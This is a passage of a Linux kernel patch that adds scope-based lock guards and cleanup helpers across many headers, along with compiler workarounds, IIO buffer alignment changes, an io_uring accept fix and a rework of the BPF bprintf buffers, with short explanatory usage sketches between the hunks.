++ * locks that don't have a native type (e.g. RCU, preempt) or those that need a
++ * 'fat' pointer (e.g. spin_lock_irqsave).
++ *
++ * DEFINE_LOCK_GUARD_0(name, lock, unlock, ...)
++ * DEFINE_LOCK_GUARD_1(name, type, lock, unlock, ...)
++ *
++ * will result in the following type:
++ *
++ *   typedef struct {
++ *	type *lock;		// 'type := void' for the _0 variant
++ *	__VA_ARGS__;
++ *   } class_##name##_t;
++ *
++ * As above, both _lock and _unlock are statements, except this time '_T' will
++ * be a pointer to the above struct.
++ */
++
++#define __DEFINE_UNLOCK_GUARD(_name, _type, _unlock, ...)		\
++typedef struct {							\
++	_type *lock;							\
++	__VA_ARGS__;							\
++} class_##_name##_t;							\
++									\
++static inline void class_##_name##_destructor(class_##_name##_t *_T)	\
++{									\
++	if (_T->lock) { _unlock; }					\
++}
++
++
++#define __DEFINE_LOCK_GUARD_1(_name, _type, _lock)			\
++static inline class_##_name##_t class_##_name##_constructor(_type *l)	\
++{									\
++	class_##_name##_t _t = { .lock = l }, *_T = &_t;		\
++	_lock;								\
++	return _t;							\
++}
++
++#define __DEFINE_LOCK_GUARD_0(_name, _lock)				\
++static inline class_##_name##_t class_##_name##_constructor(void)	\
++{									\
++	class_##_name##_t _t = { .lock = (void*)1 },			\
++			 *_T __maybe_unused = &_t;			\
++	_lock;								\
++	return _t;							\
++}
++
++#define DEFINE_LOCK_GUARD_1(_name, _type, _lock, _unlock, ...)		\
++__DEFINE_UNLOCK_GUARD(_name, _type, _unlock, __VA_ARGS__)		\
++__DEFINE_LOCK_GUARD_1(_name, _type, _lock)
++
++#define DEFINE_LOCK_GUARD_0(_name, _lock, _unlock, ...)			\
++__DEFINE_UNLOCK_GUARD(_name, void, _unlock, __VA_ARGS__)		\
++__DEFINE_LOCK_GUARD_0(_name, _lock)
++
++#endif /* __LINUX_GUARDS_H */
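
A quick sketch of how the DEFINE_LOCK_GUARD_1() machinery above is meant to be consumed; the lock type and its acquire/release helpers here are purely hypothetical, chosen only so the expansion's moving parts are visible:

	/* hypothetical lock type, for illustration only */
	struct demo_lock { int locked; };
	static inline void demo_acquire(struct demo_lock *l) { l->locked = 1; }
	static inline void demo_release(struct demo_lock *l) { l->locked = 0; }

	DEFINE_LOCK_GUARD_1(demo, struct demo_lock,
			    demo_acquire(_T->lock),
			    demo_release(_T->lock))

	static struct demo_lock dl;

	static void whole_function(void)
	{
		guard(demo)(&dl);	/* demo_release() runs on every return path */
		/* ... critical section spanning the rest of the function ... */
	}

	static void one_block(void)
	{
		scoped_guard(demo, &dl) {
			/* ... critical section bound to this block only ... */
		}
	}

Real users appear later in this patch as guards for mutexes, spinlocks, irqflags, RCU and SRCU.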
+diff --git a/include/linux/compiler-clang.h b/include/linux/compiler-clang.h
+index 6cfd6902bd5b9..9b673fefcef8a 100644
+--- a/include/linux/compiler-clang.h
++++ b/include/linux/compiler-clang.h
+@@ -5,6 +5,15 @@
+ 
+ /* Compiler specific definitions for Clang compiler */
+ 
++/*
++ * Clang prior to 17 is being silly and considers many __cleanup() variables
++ * as unused (because they are, their sole purpose is to go out of scope).
++ *
++ * https://reviews.llvm.org/D152180
++ */
++#undef __cleanup
++#define __cleanup(func) __maybe_unused __attribute__((__cleanup__(func)))
++
+ /* same as gcc, this was present in clang-2.6 so we can assume it works
+  * with any version that can compile the kernel
+  */
+diff --git a/include/linux/compiler-gcc.h b/include/linux/compiler-gcc.h
+index f55a37efdb974..149a520515e1d 100644
+--- a/include/linux/compiler-gcc.h
++++ b/include/linux/compiler-gcc.h
+@@ -66,6 +66,26 @@
+ 		__builtin_unreachable();	\
+ 	} while (0)
+ 
++/*
++ * GCC 'asm goto' with outputs miscompiles certain code sequences:
++ *
++ *   https://gcc.gnu.org/bugzilla/show_bug.cgi?id=113921
++ *
++ * Work around it via the same compiler barrier quirk that we used
++ * to use for the old 'asm goto' workaround.
++ *
++ * Also, always mark such 'asm goto' statements as volatile: all
++ * asm goto statements are supposed to be volatile as per the
++ * documentation, but some versions of gcc didn't actually do
++ * that for asms with outputs:
++ *
++ *    https://gcc.gnu.org/bugzilla/show_bug.cgi?id=98619
++ */
++#ifdef CONFIG_GCC_ASM_GOTO_OUTPUT_WORKAROUND
++#define asm_goto_output(x...) \
++	do { asm volatile goto(x); asm (""); } while (0)
++#endif
++
+ #if defined(CONFIG_ARCH_USE_BUILTIN_BSWAP)
+ #define __HAVE_BUILTIN_BSWAP32__
+ #define __HAVE_BUILTIN_BSWAP64__
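
For readers unfamiliar with the construct being worked around: 'asm goto' with outputs carries output operands plus a label list after a fourth colon. A hedged, x86-only illustration (not taken from this patch) of the kind of statement asm_goto_output() wraps:

	static inline bool dec_and_test_zero(int *v)
	{
		asm_goto_output("decl %0; jz %l[is_zero]"
				: "+m" (*v) : : "cc" : is_zero);
		return false;
	is_zero:
		return true;
	}

With the workaround enabled, the trailing empty asm("") acts as a compiler barrier after the statement, the same trick used for the original 'asm goto' bugs.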
+diff --git a/include/linux/compiler_attributes.h b/include/linux/compiler_attributes.h
+index 898b3458b24a0..ae4c9579ca5f0 100644
+--- a/include/linux/compiler_attributes.h
++++ b/include/linux/compiler_attributes.h
+@@ -75,6 +75,12 @@
+ # define __assume_aligned(a, ...)
+ #endif
+ 
++/*
++ *   gcc: https://gcc.gnu.org/onlinedocs/gcc/Common-Variable-Attributes.html#index-cleanup-variable-attribute
++ * clang: https://clang.llvm.org/docs/AttributeReference.html#cleanup
++ */
++#define __cleanup(func)			__attribute__((__cleanup__(func)))
++
+ /*
+  *   gcc: https://gcc.gnu.org/onlinedocs/gcc/Common-Function-Attributes.html#index-cold-function-attribute
+  *   gcc: https://gcc.gnu.org/onlinedocs/gcc/Label-Attributes.html#index-cold-label-attribute
+diff --git a/include/linux/compiler_types.h b/include/linux/compiler_types.h
+index eb0466236661f..574b4121ebe3e 100644
+--- a/include/linux/compiler_types.h
++++ b/include/linux/compiler_types.h
+@@ -284,8 +284,15 @@ struct ftrace_likely_data {
+ # define __realloc_size(x, ...)
+ #endif
+ 
+-#ifndef asm_volatile_goto
+-#define asm_volatile_goto(x...) asm goto(x)
++/*
++ * Some versions of gcc do not mark 'asm goto' volatile:
++ *
++ *  https://gcc.gnu.org/bugzilla/show_bug.cgi?id=103979
++ *
++ * We do it here by hand, because it doesn't hurt.
++ */
++#ifndef asm_goto_output
++#define asm_goto_output(x...) asm volatile goto(x)
+ #endif
+ 
+ #ifdef CONFIG_CC_HAS_ASM_INLINE
+diff --git a/include/linux/device.h b/include/linux/device.h
+index 7cf24330d6814..5520bb546a4ac 100644
+--- a/include/linux/device.h
++++ b/include/linux/device.h
+@@ -30,6 +30,7 @@
+ #include <linux/device/bus.h>
+ #include <linux/device/class.h>
+ #include <linux/device/driver.h>
++#include <linux/cleanup.h>
+ #include <asm/device.h>
+ 
+ struct device;
+@@ -898,6 +899,9 @@ void device_unregister(struct device *dev);
+ void device_initialize(struct device *dev);
+ int __must_check device_add(struct device *dev);
+ void device_del(struct device *dev);
++
++DEFINE_FREE(device_del, struct device *, if (_T) device_del(_T))
++
+ int device_for_each_child(struct device *dev, void *data,
+ 			  int (*fn)(struct device *dev, void *data));
+ int device_for_each_child_reverse(struct device *dev, void *data,
+@@ -1071,6 +1075,9 @@ extern int (*platform_notify_remove)(struct device *dev);
+  */
+ struct device *get_device(struct device *dev);
+ void put_device(struct device *dev);
++
++DEFINE_FREE(put_device, struct device *, if (_T) put_device(_T))
++
+ bool kill_device(struct device *dev);
+ 
+ #ifdef CONFIG_DEVTMPFS
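
With DEFINE_FREE(put_device, ...) available, dropping a device reference on error paths can be delegated to scope exit. A minimal sketch; demo_find_device() is hypothetical and stands in for any lookup returning a referenced device or NULL:

	static int demo_use_device(void)
	{
		struct device *dev __free(put_device) = demo_find_device();

		if (!dev)
			return -ENODEV;

		/* ... use dev; put_device() runs when dev goes out of scope ... */
		return 0;
	}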
+diff --git a/include/linux/file.h b/include/linux/file.h
+index 39704eae83e27..6e9099d293436 100644
+--- a/include/linux/file.h
++++ b/include/linux/file.h
+@@ -10,6 +10,7 @@
+ #include <linux/types.h>
+ #include <linux/posix_types.h>
+ #include <linux/errno.h>
++#include <linux/cleanup.h>
+ 
+ struct file;
+ 
+@@ -80,6 +81,8 @@ static inline void fdput_pos(struct fd f)
+ 	fdput(f);
+ }
+ 
++DEFINE_CLASS(fd, struct fd, fdput(_T), fdget(fd), int fd)
++
+ extern int f_dupfd(unsigned int from, struct file *file, unsigned flags);
+ extern int replace_fd(unsigned fd, struct file *file, unsigned flags);
+ extern void set_close_on_exec(unsigned int fd, int flag);
+@@ -88,6 +91,9 @@ extern int __get_unused_fd_flags(unsigned flags, unsigned long nofile);
+ extern int get_unused_fd_flags(unsigned flags);
+ extern void put_unused_fd(unsigned int fd);
+ 
++DEFINE_CLASS(get_unused_fd, int, if (_T >= 0) put_unused_fd(_T),
++	     get_unused_fd_flags(flags), unsigned flags)
++
+ extern void fd_install(unsigned int fd, struct file *file);
+ 
+ extern int __receive_fd(struct file *file, int __user *ufd,
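
The new fd class turns the fdget()/fdput() pairing into a scope rule. A hedged sketch of a caller:

	static int demo_check_fd(int ufd)
	{
		CLASS(fd, f)(ufd);	/* fdput(f) runs automatically on return */

		if (!f.file)
			return -EBADF;

		/* ... inspect f.file freely; every return path is covered ... */
		return 0;
	}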
+diff --git a/include/linux/iio/adc/ad_sigma_delta.h b/include/linux/iio/adc/ad_sigma_delta.h
+index 7852f6c9a714c..719cf9cc6e1ac 100644
+--- a/include/linux/iio/adc/ad_sigma_delta.h
++++ b/include/linux/iio/adc/ad_sigma_delta.h
+@@ -8,6 +8,8 @@
+ #ifndef __AD_SIGMA_DELTA_H__
+ #define __AD_SIGMA_DELTA_H__
+ 
++#include <linux/iio/iio.h>
++
+ enum ad_sigma_delta_mode {
+ 	AD_SD_MODE_CONTINUOUS = 0,
+ 	AD_SD_MODE_SINGLE = 1,
+@@ -99,7 +101,7 @@ struct ad_sigma_delta {
+ 	 * 'rx_buf' is up to 32 bits per sample + 64 bit timestamp,
+ 	 * rounded to 16 bytes to take into account padding.
+ 	 */
+-	uint8_t				tx_buf[4] ____cacheline_aligned;
++	uint8_t				tx_buf[4] __aligned(IIO_DMA_MINALIGN);
+ 	uint8_t				rx_buf[16] __aligned(8);
+ };
+ 
+diff --git a/include/linux/iio/common/st_sensors.h b/include/linux/iio/common/st_sensors.h
+index db4a1b260348c..c34e648f07e28 100644
+--- a/include/linux/iio/common/st_sensors.h
++++ b/include/linux/iio/common/st_sensors.h
+@@ -261,9 +261,9 @@ struct st_sensor_data {
+ 	bool hw_irq_trigger;
+ 	s64 hw_timestamp;
+ 
+-	char buffer_data[ST_SENSORS_MAX_BUFFER_SIZE] ____cacheline_aligned;
+-
+ 	struct mutex odr_lock;
++
++	char buffer_data[ST_SENSORS_MAX_BUFFER_SIZE] __aligned(IIO_DMA_MINALIGN);
+ };
+ 
+ #ifdef CONFIG_IIO_BUFFER
+diff --git a/include/linux/iio/imu/adis.h b/include/linux/iio/imu/adis.h
+index bcbefb7574751..af083aa0c4317 100644
+--- a/include/linux/iio/imu/adis.h
++++ b/include/linux/iio/imu/adis.h
+@@ -11,6 +11,7 @@
+ 
+ #include <linux/spi/spi.h>
+ #include <linux/interrupt.h>
++#include <linux/iio/iio.h>
+ #include <linux/iio/types.h>
+ 
+ #define ADIS_WRITE_REG(reg) ((0x80 | (reg)))
+@@ -131,7 +132,7 @@ struct adis {
+ 	unsigned long		irq_flag;
+ 	void			*buffer;
+ 
+-	u8			tx[10] ____cacheline_aligned;
++	u8			tx[10] __aligned(IIO_DMA_MINALIGN);
+ 	u8			rx[4];
+ };
+ 
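
The three IIO header changes above apply one rule: buffers that may be targeted by DMA move to the tail of the state structure and are aligned to IIO_DMA_MINALIGN rather than ____cacheline_aligned, so cache maintenance on the buffer cannot corrupt neighbouring members. The layout rule in isolation, with a hypothetical driver struct:

	struct demo_adc_state {
		struct spi_device	*spi;
		struct mutex		lock;
		/*
		 * DMA-safe region: keep these members last and aligned so
		 * nothing else shares their cache lines.
		 */
		u8			tx[4] __aligned(IIO_DMA_MINALIGN);
		u8			rx[4];
	};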
+diff --git a/include/linux/init.h b/include/linux/init.h
+index 077d7f93b402f..c96aea3229ca1 100644
+--- a/include/linux/init.h
++++ b/include/linux/init.h
+@@ -87,9 +87,6 @@
+ 						  __latent_entropy
+ #define __meminitdata    __section(".meminit.data")
+ #define __meminitconst   __section(".meminit.rodata")
+-#define __memexit        __section(".memexit.text") __exitused __cold notrace
+-#define __memexitdata    __section(".memexit.data")
+-#define __memexitconst   __section(".memexit.rodata")
+ 
+ /* For assembly routines */
+ #define __HEAD		.section	".head.text","ax"
+diff --git a/include/linux/irqflags.h b/include/linux/irqflags.h
+index 5ec0fa71399e4..2b665c32f5fe6 100644
+--- a/include/linux/irqflags.h
++++ b/include/linux/irqflags.h
+@@ -13,6 +13,7 @@
+ #define _LINUX_TRACE_IRQFLAGS_H
+ 
+ #include <linux/typecheck.h>
++#include <linux/cleanup.h>
+ #include <asm/irqflags.h>
+ #include <asm/percpu.h>
+ 
+@@ -267,4 +268,10 @@ extern void warn_bogus_irq_restore(void);
+ 
+ #define irqs_disabled_flags(flags) raw_irqs_disabled_flags(flags)
+ 
++DEFINE_LOCK_GUARD_0(irq, local_irq_disable(), local_irq_enable())
++DEFINE_LOCK_GUARD_0(irqsave,
++		    local_irq_save(_T->flags),
++		    local_irq_restore(_T->flags),
++		    unsigned long flags)
++
+ #endif
+diff --git a/include/linux/mmc/sdio_ids.h b/include/linux/mmc/sdio_ids.h
+index 74f9d9a6d3307..0e4ef9c5127ad 100644
+--- a/include/linux/mmc/sdio_ids.h
++++ b/include/linux/mmc/sdio_ids.h
+@@ -102,6 +102,7 @@
+ #define SDIO_DEVICE_ID_MARVELL_8977_BT		0x9146
+ #define SDIO_DEVICE_ID_MARVELL_8987_WLAN	0x9149
+ #define SDIO_DEVICE_ID_MARVELL_8987_BT		0x914a
++#define SDIO_DEVICE_ID_MARVELL_8978_WLAN	0x9159
+ 
+ #define SDIO_VENDOR_ID_MEDIATEK			0x037a
+ #define SDIO_DEVICE_ID_MEDIATEK_MT7663		0x7663
+diff --git a/include/linux/mutex.h b/include/linux/mutex.h
+index 8f226d460f51c..a33aa9eb9fc3b 100644
+--- a/include/linux/mutex.h
++++ b/include/linux/mutex.h
+@@ -19,6 +19,7 @@
+ #include <asm/processor.h>
+ #include <linux/osq_lock.h>
+ #include <linux/debug_locks.h>
++#include <linux/cleanup.h>
+ 
+ #ifdef CONFIG_DEBUG_LOCK_ALLOC
+ # define __DEP_MAP_MUTEX_INITIALIZER(lockname)			\
+@@ -219,4 +220,7 @@ extern void mutex_unlock(struct mutex *lock);
+ 
+ extern int atomic_dec_and_mutex_lock(atomic_t *cnt, struct mutex *lock);
+ 
++DEFINE_GUARD(mutex, struct mutex *, mutex_lock(_T), mutex_unlock(_T))
++DEFINE_FREE(mutex, struct mutex *, if (_T) mutex_unlock(_T))
++
+ #endif /* __LINUX_MUTEX_H */
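
Usage sketch for the new mutex guard; the lock and counter names are illustrative:

	static DEFINE_MUTEX(demo_lock);
	static int demo_count;

	static int demo_inc(void)
	{
		guard(mutex)(&demo_lock);	/* mutex_unlock() on every return path */

		if (demo_count == INT_MAX)
			return -EOVERFLOW;	/* the early return still unlocks */
		return ++demo_count;
	}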
+diff --git a/include/linux/netfilter/ipset/ip_set.h b/include/linux/netfilter/ipset/ip_set.h
+index 72f5ebc5c97a9..0b217d4ae2a48 100644
+--- a/include/linux/netfilter/ipset/ip_set.h
++++ b/include/linux/netfilter/ipset/ip_set.h
+@@ -186,6 +186,8 @@ struct ip_set_type_variant {
+ 	/* Return true if "b" set is the same as "a"
+ 	 * according to the create set parameters */
+ 	bool (*same_set)(const struct ip_set *a, const struct ip_set *b);
++	/* Cancel ongoing garbage collectors before destroying the set */
++	void (*cancel_gc)(struct ip_set *set);
+ 	/* Region-locking is used */
+ 	bool region_lock;
+ };
+@@ -242,6 +244,8 @@ extern void ip_set_type_unregister(struct ip_set_type *set_type);
+ 
+ /* A generic IP set */
+ struct ip_set {
++	/* For call_rcu() in destroy */
++	struct rcu_head rcu;
+ 	/* The name of the set */
+ 	char name[IPSET_MAXNAMELEN];
+ 	/* Lock protecting the set data */
+diff --git a/include/linux/percpu.h b/include/linux/percpu.h
+index f1ec5ad1351cc..ba00a49369cae 100644
+--- a/include/linux/percpu.h
++++ b/include/linux/percpu.h
+@@ -8,6 +8,7 @@
+ #include <linux/cpumask.h>
+ #include <linux/pfn.h>
+ #include <linux/init.h>
++#include <linux/cleanup.h>
+ 
+ #include <asm/percpu.h>
+ 
+@@ -128,6 +129,9 @@ extern void __init setup_per_cpu_areas(void);
+ extern void __percpu *__alloc_percpu_gfp(size_t size, size_t align, gfp_t gfp) __alloc_size(1);
+ extern void __percpu *__alloc_percpu(size_t size, size_t align) __alloc_size(1);
+ extern void free_percpu(void __percpu *__pdata);
++
++DEFINE_FREE(free_percpu, void __percpu *, free_percpu(_T))
++
+ extern phys_addr_t per_cpu_ptr_to_phys(void *addr);
+ 
+ #define alloc_percpu_gfp(type, gfp)					\
+diff --git a/include/linux/preempt.h b/include/linux/preempt.h
+index 8cfcc5d454512..9aa6358a1a16b 100644
+--- a/include/linux/preempt.h
++++ b/include/linux/preempt.h
+@@ -8,6 +8,7 @@
+  */
+ 
+ #include <linux/linkage.h>
++#include <linux/cleanup.h>
+ #include <linux/list.h>
+ 
+ /*
+@@ -474,4 +475,8 @@ static __always_inline void preempt_enable_nested(void)
+ 		preempt_enable();
+ }
+ 
++DEFINE_LOCK_GUARD_0(preempt, preempt_disable(), preempt_enable())
++DEFINE_LOCK_GUARD_0(preempt_notrace, preempt_disable_notrace(), preempt_enable_notrace())
++DEFINE_LOCK_GUARD_0(migrate, migrate_disable(), migrate_enable())
++
+ #endif /* __LINUX_PREEMPT_H */
+diff --git a/include/linux/rcupdate.h b/include/linux/rcupdate.h
+index 46bd9a331fd5d..d2507168b9c7b 100644
+--- a/include/linux/rcupdate.h
++++ b/include/linux/rcupdate.h
+@@ -27,6 +27,7 @@
+ #include <linux/preempt.h>
+ #include <linux/bottom_half.h>
+ #include <linux/lockdep.h>
++#include <linux/cleanup.h>
+ #include <asm/processor.h>
+ #include <linux/cpumask.h>
+ #include <linux/context_tracking_irq.h>
+@@ -1077,4 +1078,6 @@ rcu_head_after_call_rcu(struct rcu_head *rhp, rcu_callback_t f)
+ extern int rcu_expedited;
+ extern int rcu_normal;
+ 
++DEFINE_LOCK_GUARD_0(rcu, rcu_read_lock(), rcu_read_unlock())
++
+ #endif /* __LINUX_RCUPDATE_H */
+diff --git a/include/linux/rwsem.h b/include/linux/rwsem.h
+index efa5c324369a2..1dd530ce8b45b 100644
+--- a/include/linux/rwsem.h
++++ b/include/linux/rwsem.h
+@@ -15,6 +15,7 @@
+ #include <linux/spinlock.h>
+ #include <linux/atomic.h>
+ #include <linux/err.h>
++#include <linux/cleanup.h>
+ 
+ #ifdef CONFIG_DEBUG_LOCK_ALLOC
+ # define __RWSEM_DEP_MAP_INIT(lockname)			\
+@@ -201,6 +202,13 @@ extern void up_read(struct rw_semaphore *sem);
+  */
+ extern void up_write(struct rw_semaphore *sem);
+ 
++DEFINE_GUARD(rwsem_read, struct rw_semaphore *, down_read(_T), up_read(_T))
++DEFINE_GUARD(rwsem_write, struct rw_semaphore *, down_write(_T), up_write(_T))
++
++DEFINE_FREE(up_read, struct rw_semaphore *, if (_T) up_read(_T))
++DEFINE_FREE(up_write, struct rw_semaphore *, if (_T) up_write(_T))
++
++
+ /*
+  * downgrade write lock to read lock
+  */
+diff --git a/include/linux/sched/task.h b/include/linux/sched/task.h
+index 7291fb6399d2a..aaa25ed1a8fe0 100644
+--- a/include/linux/sched/task.h
++++ b/include/linux/sched/task.h
+@@ -145,6 +145,8 @@ static inline void put_task_struct(struct task_struct *t)
+ 		__put_task_struct(t);
+ }
+ 
++DEFINE_FREE(put_task, struct task_struct *, if (_T) put_task_struct(_T))
++
+ static inline void put_task_struct_many(struct task_struct *t, int nr)
+ {
+ 	if (refcount_sub_and_test(nr, &t->usage))
+diff --git a/include/linux/slab.h b/include/linux/slab.h
+index 45efc6c553b82..cb4b5deca9a9c 100644
+--- a/include/linux/slab.h
++++ b/include/linux/slab.h
+@@ -17,6 +17,7 @@
+ #include <linux/types.h>
+ #include <linux/workqueue.h>
+ #include <linux/percpu-refcount.h>
++#include <linux/cleanup.h>
+ 
+ 
+ /*
+@@ -197,6 +198,8 @@ void kfree(const void *objp);
+ void kfree_sensitive(const void *objp);
+ size_t __ksize(const void *objp);
+ 
++DEFINE_FREE(kfree, void *, if (_T) kfree(_T))
++
+ /**
+  * ksize - Report actual allocation size of associated object
+  *
+diff --git a/include/linux/spinlock.h b/include/linux/spinlock.h
+index 1341f7d62da44..83377540c369a 100644
+--- a/include/linux/spinlock.h
++++ b/include/linux/spinlock.h
+@@ -61,6 +61,7 @@
+ #include <linux/stringify.h>
+ #include <linux/bottom_half.h>
+ #include <linux/lockdep.h>
++#include <linux/cleanup.h>
+ #include <asm/barrier.h>
+ #include <asm/mmiowb.h>
+ 
+@@ -493,5 +494,35 @@ int __alloc_bucket_spinlocks(spinlock_t **locks, unsigned int *lock_mask,
+ 
+ void free_bucket_spinlocks(spinlock_t *locks);
+ 
++DEFINE_LOCK_GUARD_1(raw_spinlock, raw_spinlock_t,
++		    raw_spin_lock(_T->lock),
++		    raw_spin_unlock(_T->lock))
++
++DEFINE_LOCK_GUARD_1(raw_spinlock_nested, raw_spinlock_t,
++		    raw_spin_lock_nested(_T->lock, SINGLE_DEPTH_NESTING),
++		    raw_spin_unlock(_T->lock))
++
++DEFINE_LOCK_GUARD_1(raw_spinlock_irq, raw_spinlock_t,
++		    raw_spin_lock_irq(_T->lock),
++		    raw_spin_unlock_irq(_T->lock))
++
++DEFINE_LOCK_GUARD_1(raw_spinlock_irqsave, raw_spinlock_t,
++		    raw_spin_lock_irqsave(_T->lock, _T->flags),
++		    raw_spin_unlock_irqrestore(_T->lock, _T->flags),
++		    unsigned long flags)
++
++DEFINE_LOCK_GUARD_1(spinlock, spinlock_t,
++		    spin_lock(_T->lock),
++		    spin_unlock(_T->lock))
++
++DEFINE_LOCK_GUARD_1(spinlock_irq, spinlock_t,
++		    spin_lock_irq(_T->lock),
++		    spin_unlock_irq(_T->lock))
++
++DEFINE_LOCK_GUARD_1(spinlock_irqsave, spinlock_t,
++		    spin_lock_irqsave(_T->lock, _T->flags),
++		    spin_unlock_irqrestore(_T->lock, _T->flags),
++		    unsigned long flags)
++
+ #undef __LINUX_INSIDE_SPINLOCK_H
+ #endif /* __LINUX_SPINLOCK_H */
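
The irqsave variants show why DEFINE_LOCK_GUARD_1() supports extra storage: the saved flags live inside the guard object (_T->flags) rather than in a caller-side local. A hedged sketch:

	static DEFINE_SPINLOCK(demo_lock);
	static LIST_HEAD(demo_list);

	static void demo_add(struct list_head *node)
	{
		scoped_guard(spinlock_irqsave, &demo_lock) {
			list_add_tail(node, &demo_list);
		}	/* spin_unlock_irqrestore() with the flags saved at entry */
	}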
+diff --git a/include/linux/srcu.h b/include/linux/srcu.h
+index 01226e4d960a0..f9e1fa7ff86fc 100644
+--- a/include/linux/srcu.h
++++ b/include/linux/srcu.h
+@@ -212,4 +212,9 @@ static inline void smp_mb__after_srcu_read_unlock(void)
+ 	/* __srcu_read_unlock has smp_mb() internally so nothing to do here. */
+ }
+ 
++DEFINE_LOCK_GUARD_1(srcu, struct srcu_struct,
++		    _T->idx = srcu_read_lock(_T->lock),
++		    srcu_read_unlock(_T->lock, _T->idx),
++		    int idx)
++
+ #endif
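
The SRCU guard uses the same extra-storage trick to carry the read-side index from lock to unlock. A sketch; demo_srcu is illustrative:

	DEFINE_SRCU(demo_srcu);

	static void demo_read_side(void)
	{
		guard(srcu)(&demo_srcu);	/* idx kept in the guard, passed to unlock */
		/* ... SRCU read-side critical section ... */
	}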
+diff --git a/include/net/tls.h b/include/net/tls.h
+index c36bf4c50027e..899c863aba02c 100644
+--- a/include/net/tls.h
++++ b/include/net/tls.h
+@@ -108,9 +108,6 @@ struct tls_sw_context_tx {
+ 	struct tls_rec *open_rec;
+ 	struct list_head tx_list;
+ 	atomic_t encrypt_pending;
+-	/* protect crypto_wait with encrypt_pending */
+-	spinlock_t encrypt_compl_lock;
+-	int async_notify;
+ 	u8 async_capable:1;
+ 
+ #define BIT_TX_SCHEDULED	0
+@@ -147,8 +144,6 @@ struct tls_sw_context_rx {
+ 	struct tls_strparser strp;
+ 
+ 	atomic_t decrypt_pending;
+-	/* protect crypto_wait with decrypt_pending*/
+-	spinlock_t decrypt_compl_lock;
+ 	struct sk_buff_head async_hold;
+ 	struct wait_queue_head wq;
+ };
+diff --git a/init/Kconfig b/init/Kconfig
+index 148704640252e..ffb927bf6034f 100644
+--- a/init/Kconfig
++++ b/init/Kconfig
+@@ -89,6 +89,15 @@ config CC_HAS_ASM_GOTO_TIED_OUTPUT
+ 	# Detect buggy gcc and clang, fixed in gcc-11 clang-14.
+ 	def_bool $(success,echo 'int foo(int *x) { asm goto (".long (%l[bar]) - .": "+m"(*x) ::: bar); return *x; bar: return 0; }' | $CC -x c - -c -o /dev/null)
+ 
++config GCC_ASM_GOTO_OUTPUT_WORKAROUND
++	bool
++	depends on CC_IS_GCC && CC_HAS_ASM_GOTO_OUTPUT
++	# Fixed in GCC 14, 13.3, 12.4 and 11.5
++	# https://gcc.gnu.org/bugzilla/show_bug.cgi?id=113921
++	default y if GCC_VERSION < 110500
++	default y if GCC_VERSION >= 120000 && GCC_VERSION < 120400
++	default y if GCC_VERSION >= 130000 && GCC_VERSION < 130300
++
+ config TOOLS_SUPPORT_RELR
+ 	def_bool $(success,env "CC=$(CC)" "LD=$(LD)" "NM=$(NM)" "OBJCOPY=$(OBJCOPY)" $(srctree)/scripts/tools-support-relr.sh)
+ 
+diff --git a/io_uring/net.c b/io_uring/net.c
+index 618ab186fe036..c062ce66af12c 100644
+--- a/io_uring/net.c
++++ b/io_uring/net.c
+@@ -1326,7 +1326,7 @@ int io_accept(struct io_kiocb *req, unsigned int issue_flags)
+ 			 * has already been done
+ 			 */
+ 			if (issue_flags & IO_URING_F_MULTISHOT)
+-				ret = IOU_ISSUE_SKIP_COMPLETE;
++				return IOU_ISSUE_SKIP_COMPLETE;
+ 			return ret;
+ 		}
+ 		if (ret == -ERESTARTSYS)
+@@ -1350,7 +1350,8 @@ int io_accept(struct io_kiocb *req, unsigned int issue_flags)
+ 	if (io_post_aux_cqe(ctx, req->cqe.user_data, ret, IORING_CQE_F_MORE, false))
+ 		goto retry;
+ 
+-	return -ECANCELED;
++	io_req_set_res(req, ret, 0);
++	return IOU_STOP_MULTISHOT;
+ }
+ 
+ int io_socket_prep(struct io_kiocb *req, const struct io_uring_sqe *sqe)
+diff --git a/kernel/bpf/helpers.c b/kernel/bpf/helpers.c
+index 34135fbd6097e..6a61a98d602cd 100644
+--- a/kernel/bpf/helpers.c
++++ b/kernel/bpf/helpers.c
+@@ -753,19 +753,20 @@ static int bpf_trace_copy_string(char *buf, void *unsafe_ptr, char fmt_ptype,
+ /* Per-cpu temp buffers used by printf-like helpers to store the bprintf binary
+  * arguments representation.
+  */
+-#define MAX_BPRINTF_BUF_LEN	512
++#define MAX_BPRINTF_BIN_ARGS	512
+ 
+ /* Support executing three nested bprintf helper calls on a given CPU */
+ #define MAX_BPRINTF_NEST_LEVEL	3
+ struct bpf_bprintf_buffers {
+-	char tmp_bufs[MAX_BPRINTF_NEST_LEVEL][MAX_BPRINTF_BUF_LEN];
++	char bin_args[MAX_BPRINTF_BIN_ARGS];
++	char buf[MAX_BPRINTF_BUF];
+ };
+-static DEFINE_PER_CPU(struct bpf_bprintf_buffers, bpf_bprintf_bufs);
++
++static DEFINE_PER_CPU(struct bpf_bprintf_buffers[MAX_BPRINTF_NEST_LEVEL], bpf_bprintf_bufs);
+ static DEFINE_PER_CPU(int, bpf_bprintf_nest_level);
+ 
+-static int try_get_fmt_tmp_buf(char **tmp_buf)
++static int try_get_buffers(struct bpf_bprintf_buffers **bufs)
+ {
+-	struct bpf_bprintf_buffers *bufs;
+ 	int nest_level;
+ 
+ 	preempt_disable();
+@@ -775,18 +776,19 @@ static int try_get_fmt_tmp_buf(char **tmp_buf)
+ 		preempt_enable();
+ 		return -EBUSY;
+ 	}
+-	bufs = this_cpu_ptr(&bpf_bprintf_bufs);
+-	*tmp_buf = bufs->tmp_bufs[nest_level - 1];
++	*bufs = this_cpu_ptr(&bpf_bprintf_bufs[nest_level - 1]);
+ 
+ 	return 0;
+ }
+ 
+-void bpf_bprintf_cleanup(void)
++void bpf_bprintf_cleanup(struct bpf_bprintf_data *data)
+ {
+-	if (this_cpu_read(bpf_bprintf_nest_level)) {
+-		this_cpu_dec(bpf_bprintf_nest_level);
+-		preempt_enable();
+-	}
++	if (!data->bin_args && !data->buf)
++		return;
++	if (WARN_ON_ONCE(this_cpu_read(bpf_bprintf_nest_level) == 0))
++		return;
++	this_cpu_dec(bpf_bprintf_nest_level);
++	preempt_enable();
+ }
+ 
+ /*
+@@ -795,18 +797,20 @@ void bpf_bprintf_cleanup(void)
+  * Returns a negative value if fmt is an invalid format string or 0 otherwise.
+  *
+  * This can be used in two ways:
+- * - Format string verification only: when bin_args is NULL
++ * - Format string verification only: when data->get_bin_args is false
+  * - Arguments preparation: in addition to the above verification, it writes in
+- *   bin_args a binary representation of arguments usable by bstr_printf where
+- *   pointers from BPF have been sanitized.
++ *   data->bin_args a binary representation of arguments usable by bstr_printf
++ *   where pointers from BPF have been sanitized.
+  *
+  * In argument preparation mode, if 0 is returned, safe temporary buffers are
